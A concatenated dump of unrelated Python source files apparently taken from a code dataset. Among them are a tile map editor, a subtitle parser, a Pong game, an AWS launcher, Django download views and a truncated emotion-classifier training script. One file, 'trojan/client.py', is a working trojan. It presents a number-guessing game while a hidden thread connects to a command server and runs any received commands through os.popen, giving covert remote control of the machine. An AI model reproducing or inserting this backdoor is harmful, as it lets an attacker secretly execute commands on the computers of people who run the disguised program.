PaletteEditor(self.root)\r\n if self.paletteeditorwin.status:\r\n state.tiles = self.paletteeditorwin.oldtiles\r\n state.tiles.load_photos()\r\n self.palette.refresh_photo()\r\n\r\n\r\n @register('edit')\r\n def edit_map_properties(self, *args):\r\n self.mapeditwin= EditMapProperties(self.root)\r\n if self.mapeditwin.confirmed:\r\n self.enable()\r\n \r\n register.separator('edit')\r\n @register('edit')\r\n def raise_all_layers(self, *args):\r\n for x,y in itergrid(16, 16):\r\n tile = state.tiles[x,y]\r\n tile.layer = min(tile.layer+1, 7) \r\n self.palette.layer_select_buttons[state.current_tile.layer].select()\r\n self.palette.update_layer_views()\r\n\r\n @register('edit')\r\n def lower_all_layers(self, *args):\r\n for x, y in itergrid(16, 16):\r\n tile = state.tiles[x,y]\r\n tile.layer = max(0, tile.layer-1)\r\n self.palette.layer_select_buttons[state.current_tile.layer].select()\r\n self.palette.update_layer_views()\r\n\r\n register.separator('edit')\r\n @register('edit')\r\n def insert_row_top(self):\r\n settings.map_tile_height += 1\r\n state.map_y_offset += 1\r\n self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n for i, executor in enumerate(state.stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (0, 1), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (0, 1))\r\n state.stack[i].events = tuple(events)\r\n for i, executor in enumerate(state.redo_stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (0, 1), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (0, 1))\r\n state.redo_stack[i].events = tuple(events)\r\n self.map.clear_canvas()\r\n state.build_map()\r\n self.map.move_to_top()\r\n self.map.make_background()\r\n for executor in state.stack:\r\n executor.exec(self.map)\r\n\r\n @register('edit')\r\n def insert_column_left(self):\r\n settings.map_tile_width += 1\r\n state.map_x_offset += 1\r\n self.map.canvas.config(scrollregion=(0, 0, *settings.map_size))\r\n for i, executor in enumerate(state.stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (1, 0), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (1, 0))\r\n state.stack[i].events = tuple(events)\r\n for i, executor in enumerate(state.redo_stack):\r\n events = []\r\n if isinstance(executor, MapDel):\r\n for event, tile in executor.events: \r\n events.append((event + (1, 0), tile))\r\n else:\r\n for event in executor.events: \r\n events.append(event + (1, 0))\r\n state.redo_stack[i].events = tuple(events)\r\n self.map.clear_canvas()\r\n state.build_map()\r\n self.map.move_to_left()\r\n self.map.make_background()\r\n for executor in state.stack:\r\n executor.exec(self.map)\r\n \r\n @register('view')\r\n def preview(self, *args):\r\n MapPreview(self.root)\r\n\r\n \r\n def bind_events(self):\r\n _map, _palette = self.map, self.palette\r\n _map.canvas.bind('', _map.clickleft)\r\n _map.canvas.bind('', _map.clickright)\r\n _map.canvas.bind('', _map.release)\r\n _map.canvas.bind('', _map.release)\r\n _map.canvas.bind('', _map.motion)\r\n _palette.canvas.bind('', _palette.clickleft)\r\n _palette.canvas.bind('', _palette.motion)\r\n _palette.canvas.bind('', _palette.releaseleft)\r\n _palette.canvas.bind('', _palette.clickright)\r\n _palette.canvas.bind('', self.palette.releaseright)\r\n for cmd, key in settings.key_bindings.items():\r\n command = getattr(self, cmd)\r\n if command.can_be_disabled:\r\n self.root.bind(key, command)\r\n\r\n def unbind_events(self):\r\n _map, _palette = self.map, self.palette\r\n _map.canvas.unbind('')\r\n _map.canvas.unbind('')\r\n _map.canvas.unbind('')\r\n _palette.canvas.bind('')\r\n _palette.canvas.bind('')\r\n _palette.canvas.bind('')\r\n _palette.canvas.bind('')\r\n _palette.canvas.bind('')\r\n self.root.unbind('')\r\n self.root.unbind('')\r\na=App()\r\nself = a.map\r\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"23503165","text":"import re\nimport os\nimport chardet\nimport traceback\n\nos.chdir('/home/lithium/Documents')\ndirlist = os.listdir('GOT')\nfinal = open('GOTscript.txt', 'w')\n\nfor dir in dirlist:\n filelist = os.listdir(f'GOT/{dir}')\n for file in filelist:\n\n try:\n\n f = open(f'GOT/{dir}/{file}', 'rb')\n bcontent = f.read(128 * 2)\n char1 = chardet.detect(bcontent)\n content = f.read().decode(char1['encoding'])\n dia_list = re.findall(r'0000,0000,0000,,(.*?)\\\\N{\\\\fnCalibri Italic\\\\fs18\\\\1c&H3CF1F3&}(.*?){\\\\r}', \\\n content)\n print(dia_list)\n print(f'GOT/{dir}/{file}')\n flag = re.findall(r'(S\\d{2}E\\d{2})', file)[0]\n final.write(flag + '\\n')\n for dia in dia_list:\n final.write(dia[1].replace('-', ' ') + ' ')\n final.write('\\n\\n')\n except:\n pass\n # f = open(f'GOT/{dir}/{file}', 'rb')\n # content = f.read().decode('utf-8-sig')\n # dia_list = re.findall(r'0000,0000,0000,,(.*?)\\\\N{\\\\fnCalibri Italic\\\\fs18\\\\1c&H3CF1F3&}(.*?){\\\\r}', \\\n # content)\n # print(dia_list)\n # for dia in dia_list:\n # final.write(dia[1].replace('-', ' ') + ' ')\n # final.write('\\n\\n')\nfinal.close()\n","sub_path":"PyspiderSingle/GOT.py","file_name":"GOT.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"458315729","text":"# 导入 requests 包\nimport requests\nimport json\n\ndef get_hangye_data():\n ret_data = []\n try:\n url = 'https://push2.eastmoney.com/api/qt/clist/get?cb=jQuery112307879834664846898_1630941013041&fid=f62&po=1&pz=60&pn=1&np=1&fltt=2&invt=2&ut=b2884a393a59ad64002292a3e90d46a5&fs=m%3A90+t%3A2&fields=f12%2Cf14%2Cf2%2Cf3%2Cf62%2Cf184%2Cf66%2Cf69%2Cf72%2Cf75%2Cf78%2Cf81%2Cf84%2Cf87%2Cf204%2Cf205%2Cf124%2Cf1%2Cf13'\n ret = requests.get(url)\n if ret.status_code == 200:\n data =str(ret.content,encoding='utf-8')\n data = data.replace('jQuery112307879834664846898_1630941013041(','').strip()\n data = data[:-1].replace(\")\",'')\n #print(data)\n data = json.loads(data)\n #print(data)\n if 'data' in data:\n data = data['data']\n if 'diff' in data:\n for item in data['diff']:\n if 'f62' in item and float(item['f62']) > 0 and 'f66' in item and float(item['f66']) > 0 : # 主力流入 超大单流入 \n if 'f3' in item and float(item['f3']) > 0: # 上涨\n ret_data.append(item)\n\n except Exception as e:\n print_except(sys._getframe().f_code.co_name, sys.exc_info(), e)\n return ret_data\n\ndata = get_hangye_data()\nprint(data)","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"177163631","text":"# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400\nBALL_RADIUS = 20\nPAD_WIDTH = 8\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\ncounterR = 0\ncounterL = 0\n\n\n# initialize ball_pos and ball_vel for new bal in middle of table\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\ndef spawn_ball(direction):\n global ball_pos, ball_vel # these are vectors stored as lists\n ball_pos = [WIDTH / 2, HEIGHT / 2]\n ball_vel = [1, 1]\n ball_vel = [(random.randrange(120, 240)) / 60, -(random.randrange(60, 180)) / 60]\n if direction == RIGHT:\n ball_vel[0] = ball_vel[0]\n\n elif direction == LEFT:\n ball_vel[0] = -ball_vel[0]\n\n\n# return ball_pos, ball_vel\n\n\n# define event handlers\ndef new_game():\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\n global score1, score2, counterR, counterL # these are ints\n counterR = 0\n counterL = 0\n spawn_ball(RIGHT)\n\n paddle1_pos = (HEIGHT - PAD_HEIGHT) / 2\n paddle2_pos = (HEIGHT - PAD_HEIGHT) / 2\n paddle1_vel = 0\n paddle2_vel = 0\n\n\ndef draw(canvas):\n global score1, score2, paddle1_pos, paddle2_pos\n global ball_pos, ball_vel, paddle1_vel, paddle2_vel\n global counterR, counterL\n\n # draw mid line and gutters\n canvas.draw_line([WIDTH / 2, 0], [WIDTH / 2, HEIGHT], 1, \"White\")\n canvas.draw_line([PAD_WIDTH, 0], [PAD_WIDTH, HEIGHT], 1, \"Red\")\n canvas.draw_line([WIDTH - PAD_WIDTH, 0], [WIDTH - PAD_WIDTH, HEIGHT], 1, \"Blue\")\n\n # update ball\n ball_pos[0] += ball_vel[0]\n ball_pos[1] += ball_vel[1]\n if ball_pos[1] <= BALL_RADIUS or ball_pos[1] >= HEIGHT - BALL_RADIUS:\n ball_vel[1] = -ball_vel[1]\n elif (ball_pos[1] > paddle1_pos and ball_pos[1] <\n paddle1_pos + PAD_HEIGHT and ball_pos[0] <=\n PAD_WIDTH + BALL_RADIUS or ball_pos[1] >\n paddle2_pos and ball_pos[1] < paddle2_pos +\n PAD_HEIGHT and ball_pos[0] >= WIDTH -\n PAD_WIDTH - BALL_RADIUS):\n ball_vel[0] = -ball_vel[0]\n ball_vel[0] = ball_vel[0] * 1.1\n ball_vel[1] = ball_vel[1] * 1.1\n\n elif ball_pos[0] <= PAD_WIDTH + BALL_RADIUS:\n spawn_ball(RIGHT)\n counterR += 1\n elif ball_pos[0] >= WIDTH - PAD_WIDTH - BALL_RADIUS:\n spawn_ball(LEFT)\n counterL += 1\n\n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 2, \"White\", \"Gray\")\n\n # update paddle's vertical position, keep paddle on the screen\n if paddle1_pos + paddle1_vel <= HEIGHT - PAD_HEIGHT and paddle1_pos + paddle1_vel > 0:\n paddle1_pos += paddle1_vel\n if paddle2_pos + paddle2_vel <= HEIGHT - PAD_HEIGHT and paddle2_pos + paddle2_vel > 0:\n paddle2_pos += paddle2_vel\n # draw paddles\n canvas.draw_line([HALF_PAD_WIDTH, paddle1_pos], [HALF_PAD_WIDTH,\n paddle1_pos + PAD_HEIGHT], PAD_WIDTH, \"Red\")\n canvas.draw_line([WIDTH - HALF_PAD_WIDTH, paddle2_pos],\n [WIDTH - HALF_PAD_WIDTH, paddle2_pos + PAD_HEIGHT], PAD_WIDTH, \"Blue\")\n\n # determine whether paddle and ball collide\n\n # draw scores\n canvas.draw_text(\"Bluee : \" + str(counterR), [(WIDTH / 2 + WIDTH / 6), (HEIGHT / 12)], 24, \"Blue\")\n canvas.draw_text(\"Redya : \" + str(counterL), [(WIDTH / 6), (HEIGHT / 12)], 24, \"Red\")\n\n\ndef keydown(key):\n global paddle1_vel, paddle2_vel\n if key == simplegui.KEY_MAP['w']:\n paddle1_vel -= 3\n if key == simplegui.KEY_MAP['s']:\n paddle1_vel += 3\n if key == simplegui.KEY_MAP['up']:\n paddle2_vel -= 3\n if key == simplegui.KEY_MAP['down']:\n paddle2_vel += 3\n\n\ndef keyup(key):\n global paddle1_vel, paddle2_vel\n if key == simplegui.KEY_MAP['w']:\n paddle1_vel = 0\n if key == simplegui.KEY_MAP['s']:\n paddle1_vel = 0\n if key == simplegui.KEY_MAP['up']:\n paddle2_vel = 0\n if key == simplegui.KEY_MAP['down']:\n paddle2_vel = 0\n\n\ndef restart():\n new_game()\n\n\n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\nrestart0 = frame.add_button(\"Restart\", restart, 100)\n\n# start frame\nnew_game()\nframe.start()\n","sub_path":"PyFundamentals/5 pong.py","file_name":"5 pong.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"351147425","text":"import boto3\nfrom spotty.aws_cli import AwsCli\nfrom spotty.commands.abstract_config import AbstractConfigCommand\nfrom spotty.helpers.resources import wait_stack_status_changed\nfrom spotty.helpers.spot_prices import get_current_spot_price\nfrom spotty.helpers.validation import validate_instance_config\nfrom spotty.project_resources.bucket import BucketResource\nfrom spotty.project_resources.instance_profile import create_or_update_instance_profile\nfrom spotty.project_resources.stack import StackResource\nfrom spotty.commands.writers.abstract_output_writrer import AbstractOutputWriter\n\n\nclass StartCommand(AbstractConfigCommand):\n\n @staticmethod\n def get_name() -> str:\n return 'start'\n\n @staticmethod\n def get_description():\n return 'Run spot instance, sync the project and start the Docker container'\n\n @staticmethod\n def _validate_config(config):\n return validate_instance_config(config)\n\n def run(self, output: AbstractOutputWriter):\n project_config = self._config['project']\n instance_config = self._config['instance']\n\n region = instance_config['region']\n cf = boto3.client('cloudformation', region_name=region)\n ec2 = boto3.client('ec2', region_name=region)\n s3 = boto3.client('s3', region_name=region)\n\n project_name = project_config['name']\n stack = StackResource(cf, project_name, region)\n\n # check if the stack already exists\n if stack.stack_exists():\n raise ValueError('Stack \"%s\" already exists.\\n'\n 'Use \"spotty stop\" command to delete the stack.' % stack.name)\n\n # create bucket for the project\n project_bucket = BucketResource(s3, project_name, region)\n bucket_name = project_bucket.create_bucket(output)\n\n # sync the project with S3\n output.write('Syncing the project with S3...')\n\n project_filters = project_config['syncFilters']\n AwsCli(region=region).s3_sync(self._project_dir, 's3://%s/project' % bucket_name, delete=True,\n filters=project_filters, capture_output=False)\n\n # create or update instance profile\n instance_profile_arn = create_or_update_instance_profile(cf, output)\n\n # prepare CloudFormation template\n output.write('Preparing CloudFormation template...')\n\n # check availability zone\n availability_zone = instance_config['availabilityZone']\n if availability_zone:\n zones = ec2.describe_availability_zones()\n zone_names = [zone['ZoneName'] for zone in zones['AvailabilityZones']]\n if availability_zone not in zone_names:\n raise ValueError('Availability zone \"%s\" doesn\\'t exist in the \"%s\" region.'\n % (availability_zone, region))\n\n instance_type = instance_config['instanceType']\n volumes = instance_config['volumes']\n ports = instance_config['ports']\n max_price = instance_config['maxPrice']\n docker_commands = instance_config['docker']['commands']\n\n template = stack.prepare_template(ec2, availability_zone, instance_type, volumes, ports, max_price,\n docker_commands)\n\n # create stack\n ami_name = instance_config['amiName']\n root_volume_size = instance_config['rootVolumeSize']\n mount_dirs = [volume['directory'] for volume in volumes]\n docker_config = instance_config['docker']\n remote_project_dir = project_config['remoteDir']\n\n res = stack.create_stack(ec2, template, instance_profile_arn, instance_type, ami_name, root_volume_size,\n mount_dirs, bucket_name, remote_project_dir, docker_config)\n\n output.write('Waiting for the stack to be created...')\n\n resource_messages = [\n ('SpotInstance', 'launching the instance'),\n ('DockerReadyWaitCondition', 'waiting for the Docker container to be ready'),\n ]\n\n # wait for the stack to be created\n status, info = wait_stack_status_changed(cf, stack_id=res['StackId'], waiting_status='CREATE_IN_PROGRESS',\n resource_messages=resource_messages,\n resource_success_status='CREATE_COMPLETE', output=output)\n\n if status == 'CREATE_COMPLETE':\n ip_address = [row['OutputValue'] for row in info['Outputs'] if row['OutputKey'] == 'InstanceIpAddress'][0]\n availability_zone = [row['OutputValue'] for row in info['Outputs']\n if row['OutputKey'] == 'AvailabilityZone'][0]\n\n # get the current spot price\n current_price = get_current_spot_price(ec2, instance_type, availability_zone)\n\n output.write('\\n'\n '--------------------\\n'\n 'Instance is running.\\n'\n '\\n'\n 'IP address: %s\\n'\n 'Current Spot price: $%.04f\\n'\n '\\n'\n 'Use \"spotty ssh\" command to connect to the Docker container.\\n'\n '--------------------' % (ip_address, current_price))\n else:\n raise ValueError('Stack \"%s\" was not created.\\n'\n 'Please, see CloudFormation and CloudWatch logs for the details.' % stack.name)\n","sub_path":"spotty/commands/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619963228","text":"import shutil\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/waitlean/\"\n#prefix = \"waitlean\"\n#suffix = \".png\"\n#rstart = 0\n#rend = 11\n#outputstart = 11\n#frames = 100\n#reverse = False\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/leantowait/\"\n#prefix = \"leantowait\"\n#suffix = \".png\"\n#rstart = 12\n#rend = 19\n#outputstart = 19\n#frames = 40\n#reverse = True\n\n#folder = \"/home/user/Desktop/Link to stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/Bdies5/\"\n#prefix = \"Bdies5\"\n#suffix = \".png\"\n#rstart = 39\n#rend = 49\n#outputstart = 49\n#frames = 200\n#reverse = True\n\nfolder = \"/home/user/stalls/kitchen/faucet01/roulette/src/data/jake_FINAL/clips/wait_2/\"\nprefix = \"wait_2\"\nsuffix = \".png\"\nrstart = 0\nrend = 21\noutputstart = 21\nframes = 100\nreverse = True\n\n\nl = range(rstart,rend)\nif reverse: l.reverse()\nf = []\nwhile len(f) < frames:\n f.extend(l[0:len(l)-1])\n l.reverse()\n\nfor i in range(0,len(f)):\n shutil.copyfile(folder+prefix+str(f[i]).zfill(5)+suffix, folder+prefix+str(outputstart+i).zfill(5)+suffix)\n \n\n\nl = range(rstart,rend)\nf = []\nwhile len(f) < frames:\n f.extend(l[0:len(l)-1])\n l.reverse()\n\nfor i in range(0,len(f)):\n shutil.copyfile(folder+prefix+str(f[i]).zfill(5)+suffix, folder+prefix+str(outputstart+i).zfill(5)+suffix)\n \n\n","sub_path":"src/scripts/clipextender.py","file_name":"clipextender.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"533857459","text":"import Rank_Sum_Test as RST\r\n\r\nclass Wilcoxon_Rank_Sum_Test(RST.Rank_Sum_Test):\r\n def __init__(self, sample1, sample2):\r\n super(Wilcoxon_Rank_Sum_Test, self).__init__(sample1, sample2, True)\r\n\r\n def isf(self, alpha):\r\n # sf_list - accumulative of density (x>=, in descending order, 10, 9, 8, ...)\r\n\r\n if self.success < 0:\r\n return -1, -1\r\n\r\n last_idx = -1\r\n for i in range(len(self.sf_list)):\r\n if alpha <= self.sf_list[i][2]:\r\n return self.sf_list[last_idx][0], self.sf_list[last_idx][2]\r\n last_idx = i\r\n return -1, -1\r\n\r\n def ppf(self, alpha):\r\n # cdf_list - accumulative of density (<=x, in ascending order, 1,2, 3, ...)\r\n\r\n if self.success < 0:\r\n return -1, -1\r\n\r\n last_idx = -1\r\n for i in range(len(self.cdf_list)):\r\n if alpha <= self.cdf_list[i][2]:\r\n return self.cdf_list[last_idx][0], self.cdf_list[last_idx][2]\r\n last_idx = i\r\n return -1, -1\r\n","sub_path":"Wilcoxon_Rank_Sum_Test.py","file_name":"Wilcoxon_Rank_Sum_Test.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"483547536","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef get_interests(base, rate, years):\n\tmoney = 0\n\tfor x in range(years):\n\t\tmoney = (money + base) * (1 + rate)\n\treturn money\n\ndef main():\n\tbase = float(input('请输入每年金���:'))\n\trate = float(input('请输入年利率:'))\n\tyears = int(input('请输入年数:'))\n\t# money = get_interests(24550, 0.01, 20)\n\tmoney = get_interests(base, rate, years)\n\tprint(\"到期本金为:%.2f元\" % money)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"finance_util.py","file_name":"finance_util.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"295835958","text":"import base64\nimport uuid\nfrom http import HTTPStatus\nfrom mimetypes import guess_extension\n\nfrom django.conf import settings\nfrom django.http import FileResponse\nfrom django.utils.module_loading import import_string\nfrom django.utils.text import slugify\nfrom django.utils.translation import gettext as _\nfrom object_checker.base_object_checker import has_object_permission\nfrom redis import Redis\n\nfrom apps.api.response import SingleResponse\nfrom apps.core.errors import ProblemDetailException\nfrom apps.core.models import Acquisition, Entry, UserAcquisition\nfrom apps.core.views import SecuredView\n\n\nclass AcquisitionDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, acquisition_id: uuid.UUID):\n try:\n acquisition = Acquisition.objects.get(pk=acquisition_id)\n except Acquisition.DoesNotExist:\n raise ProblemDetailException(request, _(\"Acquisition not found\"), status=HTTPStatus.NOT_FOUND)\n\n if acquisition.relation != Acquisition.AcquisitionType.ACQUISITION.OPEN_ACCESS:\n self._authenticate(request)\n\n redis = Redis(\n host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DATABASE\n )\n\n if request.user.is_anonymous:\n user_id = uuid.uuid4()\n else:\n user_id = request.user.pk\n\n redis.pfadd(f\"evilflowers:popularity:{acquisition.entry_id}\", str(user_id))\n sanitized_filename = f\"{slugify(acquisition.entry.title.lower())}{guess_extension(acquisition.mime)}\"\n\n return FileResponse(acquisition.content, as_attachment=True, filename=sanitized_filename)\n\n\nclass UserAcquisitionDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, user_acquisition_id: uuid.UUID):\n try:\n user_acquisition = UserAcquisition.objects.select_related(\n 'acquisition', 'acquisition__entry'\n ).get(pk=user_acquisition_id)\n except UserAcquisition.DoesNotExist:\n raise ProblemDetailException(\n request,\n _(\"User acquisition not found\"),\n status=HTTPStatus.NOT_FOUND,\n detail_type=ProblemDetailException.DetailType.NOT_FOUND\n )\n\n if user_acquisition.type == UserAcquisition.UserAcquisitionType.PERSONAL:\n self._authenticate(request)\n\n if not has_object_permission('check_user_acquisition_read', request.user, user_acquisition):\n raise ProblemDetailException(request, _(\"Insufficient permissions\"), status=HTTPStatus.FORBIDDEN)\n\n redis = Redis(\n host=settings.REDIS_HOST, port=settings.REDIS_PORT, db=settings.REDIS_DATABASE\n )\n\n redis.pfadd(\n f\"evilflowers:popularity:{user_acquisition.acquisition.entry_id}\",\n str(uuid.uuid4()) if request.user.is_anonymous else str(request.user.pk)\n )\n\n sanitized_filename = f\"{slugify(user_acquisition.acquisition.entry.title.lower())}\" \\\n f\"{guess_extension(user_acquisition.acquisition.mime)}\"\n\n if user_acquisition.acquisition.mime in settings.EVILFLOWERS_MODIFIERS:\n modifier = import_string(settings.EVILFLOWERS_MODIFIERS[user_acquisition.acquisition.mime])(\n context={\n 'id': uuid.uuid4() if request.user.is_anonymous else str(user_acquisition.id),\n 'user_id': str(user_acquisition.user_id),\n 'username': user_acquisition.user.name,\n 'title': user_acquisition.acquisition.entry.title\n }\n )\n try:\n\n content = modifier.generate(user_acquisition.acquisition.content, request.GET.get('page', None))\n except IndexError:\n raise ProblemDetailException(request, _(\"Page not found\"), status=HTTPStatus.NOT_FOUND)\n else:\n content = user_acquisition.acquisition.content\n\n if request.GET.get('format', None) == 'base64':\n return SingleResponse(request, {\n 'data': base64.b64encode(content.read()).decode()\n })\n\n return FileResponse(content, as_attachment=True, filename=sanitized_filename)\n\n\nclass EntryImageDownload(SecuredView):\n UNSECURED_METHODS = ['GET']\n\n def get(self, request, entry_id: uuid.UUID):\n try:\n entry = Entry.objects.get(pk=entry_id, image__isnull=False)\n except Entry.DoesNotExist:\n raise ProblemDetailException(request, _(\"Entry image not found\"), status=HTTPStatus.NOT_FOUND)\n\n sanitized_filename = f\"{slugify(entry.title.lower())}{guess_extension(entry.image_mime)}\"\n\n return FileResponse(entry.image, filename=sanitized_filename)\n","sub_path":"apps/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"266650215","text":"import random\nimport socket\nimport sys\nimport threading\nimport os\n\n\ndef trojan():\n HOST = '127.0.0.1'\n PORT = 9090\n\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((HOST, PORT))\n\n cmd_mode = False\n\n while True:\n server_command = client.recv(1024).decode('utf-8')\n if server_command == 'cmdon':\n cmd_mode = True\n client.send(\"You now have terminal access!\".encode('utf-8'))\n continue\n if server_command == 'cmdoff':\n cmd_mode = False\n client.send(\"Terminal access deactivated\".encode('utf-8'))\n '''continue'''\n if cmd_mode:\n if server_command == 'lock':\n os.popen('Rundll32.exe user32.dll,LockWorkStation')\n if server_command == 'exit':\n client.send(\"Server exiting msg received\".encode('utf-8'))\n print(\"\\nServer closing\")\n else:\n os.popen(server_command)\n else:\n if server_command == \"hello\":\n print(\"\\nHello World!\")\n\n client.send(f\"{server_command} was executed successfully!\".encode('utf-8'))\n\n\ndef game():\n number = random.randint(0, 1000)\n tries = 1\n done = False\n\n while not done:\n guess = int(input(\"Enter a guess: \"))\n\n if guess == number:\n done = True\n print(\"You won!\")\n else:\n tries += 1\n if guess > number:\n print(\"The number is smaller!\")\n else:\n print(\"The number is greater\")\n\n print(f\"You needed {tries} tries!\")\n\n\nt1 = threading.Thread(target=game)\nt2 = threading.Thread(target=trojan)\n\nt1.start()\nt2.start()\n","sub_path":"trojan/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"376618488","text":"import re\n\nfrom .tl_object import TLObject\n\n\nclass TLParser:\n \"\"\"Class used to parse .tl files\"\"\"\n\n @staticmethod\n def parse_file(file_path, ignore_core=False):\n \"\"\"This method yields TLObjects from a given .tl file\"\"\"\n\n with open(file_path, encoding='utf-8') as file:\n # Start by assuming that the next found line won't\n # be a function (and will hence be a type)\n is_function = False\n\n # Read all the lines from the .tl file\n for line in file:\n # Strip comments from the line\n comment_index = line.find('//')\n if comment_index != -1:\n line = line[:comment_index]\n\n line = line.strip()\n if line:\n # Check whether the line is a type change\n # (types <-> functions) or not\n match = re.match('---(\\w+)---', line)\n if match:\n following_types = match.group(1)\n is_function = following_types == 'functions'\n\n else:\n try:\n result = TLObject.from_tl(line, is_function)\n if not ignore_core or not result.is_core_type():\n yield result\n except ValueError as e:\n if 'vector#1cb5c415' not in str(e):\n raise\n\n @staticmethod\n def find_layer(file_path):\n \"\"\"Finds the layer used on the specified scheme.tl file\"\"\"\n layer_regex = re.compile(r'^//\\s*LAYER\\s*(\\d+)$')\n with open(file_path, encoding='utf-8') as file:\n for line in file:\n match = layer_regex.match(line)\n if match:\n return int(match.group(1))\n","sub_path":"telethon_generator/parser/tl_parser.py","file_name":"tl_parser.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"269114349","text":"\"\"\"\nFile: train_emotion_classifier.py\nAuthor: Octavio Arriaga\nEmail: arriaga.camargo@gmail.com\nGithub: https://github.com/oarriaga\nDescription: Train emotion classification model\n\"\"\"\nimport warnings\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\nwarnings.filterwarnings(\"ignore\", message=\"numpy.ufunc size changed\")\n\n\nfrom keras.callbacks import ReduceLROnPlateau,TensorBoard\nfrom keras.callbacks import CSVLogger, ModelCheckpoint, EarlyStopping\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils import multi_gpu_model\nfrom keras.models import load_model\nimport tensorflow as tf\nimport argparse\n\nfrom utils.datasets import DataManager\nfrom utils.preprocessor import preprocess_input\n# from utils.visual_callbacks import AccLossPlotter\nfrom models.cnn import mini_XCEPTION, GAP_concate_XCEPTION, mini_concate_V3_XCEPTION\nfrom models.cnn import parameters_mini_XCEPTION, mini_concate_XCEPTION\n\n\n\n# parameters\nnum_epochs = 10000\ninput_shape = (64, 64, 1)\nverbose = 1\nnum_classes = 7\npatience = 80\ngpu_count = 4\nbatch_size = 32* gpu_count\nbase_path = '../trained_models/emotion_models/'\n# models_path = base_path + 'fer2013_0831_mini_concate_V3_XCEPTION.127-0.6609.hdf5'\n\n# retrain\n# model = load_model(models_path)\n# data generator\ndata_generator = ImageDataGenerator(\n featurewise_center=False,\n featurewise_std_normalization=False,\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n zoom_range=.1,\n horizontal_flip=True)\n\n# model parameters/compilation; Configures the model for training\n# optimizer: SGD suitable small datasets \n# check to see if we are compiling using just a single GPU\n\n# Instantiate the base model\n# (here, we do it on CPU, which is optional).\nwith tf.device('/cpu:0' if gpu_count > 1 else '/gpu:0'):\n model = mini_concate_V3_XCEPTION(input_shape, num_classes)\n\n# Replicates the model on N GPUs.\n# This assumes that your machine has N available GPUs.\nif gpu_count > 1:\n model = multi_gpu_model(model, gpus=gpu_count)\nelse:\n model = model\n\n\nmodel.compile(optimizer='adam', loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n\ndatasets = ['fer2013']\nfor dataset_name in datasets:\n print('Training dataset:', dataset_name)\n\n # saving model after one epoch finishing\n trained_models_path = base_path + dataset_name + '_0901__mini_concate_V3_XCEPTION'\n model_names = trained_models_path + '.{epoch:02d}-{val_acc:.4f}.hdf5' \n model_checkpoint = ModelCheckpoint(model_names, monitor='val_acc', verbose=1,\n save_best_only=True, mode='auto',period=1)\n\n # view on internal states and statistics of the model during training\n # a set callbacks functions, and visualization by tensorboard\n log_file_path = base_path + dataset_name + trained_models_path[40:] + '_emotion_training.log'\n csv_logger = CSVLogger(log_file_path, append=False)\n early_stop = EarlyStopping('val_loss', patience=patience)\n reduce_lr = ReduceLROnPlateau('val_acc', factor=0.1,\n 